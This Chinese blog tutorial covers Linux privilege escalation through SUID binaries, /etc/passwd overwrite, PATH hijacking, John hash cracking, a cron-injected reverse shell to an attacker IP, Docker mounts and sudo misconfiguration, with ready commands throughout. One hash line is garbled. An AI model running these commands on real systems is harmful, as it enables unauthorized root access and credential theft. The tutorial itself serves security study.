linux suid提权

已于 2022-04-17 16:48:15 修改
阅读量647 收藏 7
点赞数 2
分类专栏: 提权 linux 文章标签: web安全 服务器
于 2022-04-15 22:46:54 首次发布
原文链接:www.mooonsec.com
版权
本文详细介绍了Linux系统中的SUID权限、提权方法,包括利用SUID文件、passwd文件篡改、环境劫持、John密码破解、计划任务反弹shell、Docker提权和sudo权限滥用等多重提权手段,揭示了系统安全的重要性和潜在风险。
摘要由CSDN通过智能技术生成

SUID是赋予文件的一种权限,它会出现在文件拥有者权限的执行位上,具有这种权限的文件会在其执行
时,使调用者暂时获得该文件拥有者的权限。也就是如果ROOT用户给某个可执行文件加了S权限,那么
该执行程序运行的时候将拥有ROOT权限

以下命令可以发现系统上运行的所有SUID可执行文件

find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000-print2>/dev/null
find / -user root -perm -4000-exec ls -ldb {} \;

-perm 表示搜索随后的权限
-u = s表示查找root用户拥有的文件
-type表示我们正在寻找的文件类型
f 表示常规文件,而不是目录或特殊文件
2表示该进程的第二个文件描述符,即stderr(标准错误)

在这里插入图片描述

find提权

cd /tmp
touch ni
find ni -exec whoami \;

如果发现有ni这个文件就执行whoami这个命令

常见suid提权

nmap、vim、find、more、less、bash、cp、Nano、mv、awk、man、weget

passwd提权
通过OpenSSL passwd生成一个新的用户hacker,密码为hack123

openssl passwd -1 -salt moonhack 123456

1 1 1moonhack$4o50Z4aoUGaLMC0Rg4Io40
在这里插入图片描述

将其追加到kali的/etc/passwd文件中
将moonhacker: 1 1 1moonhack$4o50Z4aoUGaLMC0Rg4Io40:0:0:/root:/bin/bash追加到passwd中

moonhacker:$1$moonhack$4o50Z4aoUGaLMC0Rg4Io40:0:0:/root:/bin/bash

在这里插入图片描述

在Kali上启动一个python服务器
python -m SimpleHTTPServer 8080
将Kali上的passwd文件下载到靶机etc目录下并覆盖原来的passwd文件

wget http://192.168.1.15:8080/passwd -O /etc/passwd
在这里插入图片描述

然后切换到moonhack用户即可
在这里插入图片描述

suid提权之环境劫持

环境劫持需要的两个条件 存在带有suid的文件 suid文件存在系统命令
寻找suid文件

寻找suid文件

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述
运行发现是个查询进程的,应该使用了ps命令
在这里插入图片描述
在/tmp命令下 创建ps文件 里面使用 /bin/bash执
行命令
当tmp的路径添加到当前环境路径,再访问 /script目录 执行shell文件,允许的时候首先会采用/tmp目
录的ps文件作为命令
所以可以劫持root命令执行

cd /tmp
echo "/bin/bash" > ps
chmod 777 ps
echo $PATH
export PATH=/tmp:$PATH
cd /script
./shell

John破解shadow root密文登录提权
john会自动检测密文类型

--wordlist 字段文件
`john --wordlist="/usr/share/wordlists/rockyou.txt"  userpassw

root:$6$SblktEE6$.tpdPNBDyJVLw0LbeART/1dlTKyRE0j3s5S3czMmehp33gaZLueb9mwT2KPlp/7tVtjdwr75r.7sZAsXBV5GB/:17991:0:99999:7:::

在这里插入图片描述

Ubuntu计划任务反弹shell提权
当获取一个linux普通用户的时,查看计划任务
cat /etc/crontab
在这里插入图片描述
crontab -l 查看当前用户命令

tail -f /var/log/syslog
在这里插入图片描述
发现每一分钟执行一次cleanup.py
修改他的内容为bash反弹
vi /script/cleanup.py
bash -i >& /dev/tcp/192.168.1.15/8866 0>&1

docker 提权
docker是一个容器 可以在同一台机子虚拟多台服务。
输入命令id 和group 查询当前用户信息和组信息 发现存在docker组
在这里插入图片描述
输入命令下载使用容器把容器的目录挂载到宿主的根目录

docker run -v /:/mnt -it alpine

获得root权限
访问宿主的/etc/shadow
cat /mnt/etc/shadow

.sudo提权

sudo 是一种权限管理机制,管理员可以授权于一些普通用户去执行一些 root 执行的操作,而不需要知
道 root 的密码。
首先通过信息收集,查看是否存在sudo配置不当的可能。如果存在,寻找低权限sudo用户的密码,进而
提权。
sudo -l
列出目前用户可执行与无法执行的指令。
在这里插入图片描述
可以看到cat命令拥有root权限,可以读取所以文件
sudo cat /etc/shadow

qq_42307546
关注
专栏目录
操作系统权限提升(十九)之Linux提权-SUID提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-28 1922
SUID是一种特殊权限,设置了suid的程序文件,在用户执行该程序时,用户的权限是该程序文件属主的权限,例如程序文件的属主是root,那么执行该程序的用户就将暂时获得root账户的权限。sgid与suid类似,只是执行程序时获得的是文件属组的权限。passwd这个命令程序的权限设置,它就是设置了suid权限的只有可以执行的二进制程序文件才能设定SUID权限,非二进制文件设置SUID权限没任何意义.命令执行者要对该程序文件拥有执行(x)权限.命令执行者在执行该程序时获得该程序文件属主的身份.
suid提权linux
weixin_68652890的博客
04-15 1000
suid提权 suid(设置用户的id)是Linux中的一种特殊权限,当运行具有suid权限的二进制文件的时候,使得调用者暂时获得该文件拥有者的权限(比如a文件拥有者是root,且被赋予了s权限,当我们用另外一个普通用户调用a文件的时候,调用过程中这个普通用户会获得root权限) 除了经常看见的rwx权限还有s权限 s权限,设置使文件在执行阶段具有文件所有者的权限,相当于临时拥有文件所有者的身份。 SUID 当执行的文件被赋予了s权限,就被称为Set UID,简称为SUID的特殊权限。简称为SUID的特殊权
linux系统suid提权
focus on security
05-19 5616
SUID提权 0x01什么是SUIDSUID (Set UID)是Linux中的一种特殊权限,其功能为用户运行某个程序时,如果该程序有SUID权限,那么程序运行为进程时,进程的属主不是发起者,而是程序文件所属的属主。但是SUID权限的设置只针对二进制可执行文件,对于非可执行文件设置SUID没有任何意义. ​ 在执行过程中,调用者会暂时获得该文件的所有者权限,且该权限只在程序执行的过程中有效. 通俗的来讲,假设我们现在有一个可执行文件ls,其属主为root,当我们通过非root用户登录时,如果
LinuxSUID提权学习 - 从原理到使用
最新发布
Reset
07-01 1067
linux的文件有普通权限和特殊权限(三种)。普通权限一般为:rwx,分别为读写执行,对应的数字表示为421。三种特殊权限为:suid权限,sgid权限,sticky权限。其中suid权限作用于文件属主,sgid权限作用于属组上,sticky权限作用于other其他上。
Linux提权SUID提权
weixin_51692662的博客
08-22 2071
linux提权suid
Linux提权————利用SUID提权
热门推荐
Fly_鹏程万里
05-23 2万+
bgvfdcfhjmkjnhb
20210411web渗透学习之Linux SUID提权
qq_45290991的博客
04-13 273
Linux下有很多提权方式,,我记得之前我写了一篇内核提权web渗透学习之Linux内核提权 内核提权最好用也是最通杀的“倚天剑”。。但是实战中很难使用……因为对方不是傻子都会打补丁……所以需要的是suid提权。。测试环境为ubutu15.5 SUIDLinux的一种权限机制,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。如果拥有SUID权限,那么就可以利用系统中的二进制文件和工具来进行root提权。 就相当于说:我在使用这个文件的时候,我有了root权限,,所以一般的思路就
Linux提权手法总结以及 Linux提权exp集合
02-22
本文将深入探讨Linux提权的常见手法,以及如何防范和应对这些威胁。 首先,内核漏洞提权是最直接也最具破坏性的方式之一。当Linux内核存在安全漏洞时,攻击者可以利用这些漏洞执行恶意代码,从而获得root权限。例如...
Linux SUID提权
她叫常玉莹
08-28 1876
概述findNmaplessbashvim 概述 SUIDLinux的一种权限机制,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限,如果拥有SUID权限,那么就可以利用系统中的二进制文件和工具进行root提权。 目前可以用来提权Linux可执行文件列表 nmap vim find bash more less nano cp 用于查找SUID命令可执行文件的命令 find / -perm -u=s -type f 2>/dev/null find / -user roo..
Linux Suid提权
YouthBelief的博客
12-21 720
Suid提权 原理 SUID(设置用户ID)是一种权限类型,它被赋予一个文件,允许用户以其所有者的权限执行该文件。Linux二进制文件可以拥有这种类型的权限集有很多原因。例如,ping实用程序需要root权限才能打开网络套接字,但它也需要由标准用户执行,以验证与其他主机的连通性。 但是,如果某些现有的二进制文件和实用程序具有 SUID 权限,则它们可用于将权限提升为 root。 suid权限 表示 chmod u+s 如下 二进制文件以 root 权限执行,因为它们的权限中包含“ s ”,并且它们归 roo
Linux:SUID提权
Elite的博客
03-05 2411
以find命令为例,讲解SUID提权原理
Linux提权suid
2301_76227305的博客
04-02 1432
以上总结的是常见的suid提权,后续会持续跟新。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
LinuxSUID提权方法
内心不种满鲜花就会长满杂草
10-29 3980
SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了。 已知的可用来提权linux可行性的文件列表如下: nmap vim find bash more less nano cp 如下,新建一个2.txt的文件。我们查看权限为 -rw-r--r--。接下来我们加上suid权限,即让执行该命令的用户以命令拥有
Linux-suid提权
liver100day的博客
11-16 1406
ww
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值